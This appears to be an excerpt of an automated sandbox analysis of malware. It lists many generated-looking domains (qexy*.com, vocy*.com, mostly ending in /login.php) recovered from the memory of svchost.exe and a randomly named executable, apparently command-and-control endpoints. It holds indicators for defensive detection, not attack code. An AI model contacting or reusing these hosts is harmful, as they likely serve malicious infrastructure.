00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynol.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynyp.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynyq.com/login.php
Source: svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078523532.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqip.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqog.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyriq.com/
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyryl.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565950608.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523218130.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyryl.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexysev.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexysig.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocybuf.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocydyc.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084574856.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygef.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygim.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640883554.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640769851.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjet.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjic.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjic.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.0000000003364000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymak.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymut.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620757969.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620677895.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618514695.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620758729.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621135281.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621261518.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617312754.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocypyt.com/login.php
Source: svchost.exe, 00000002.00000003.1743887773.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqaf.com/login.php
Source: svchost.exe, 00000002.00000003.1743887773.000000000327F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqaf.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyruk.com/login.php
Source: svchost.exe, 00000002.00000003.2603421681.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565035403.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085241805.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674611166.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660552895.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675004112.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693967777.0000000003288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyryf.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyzit.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vocyzit.com/login.php
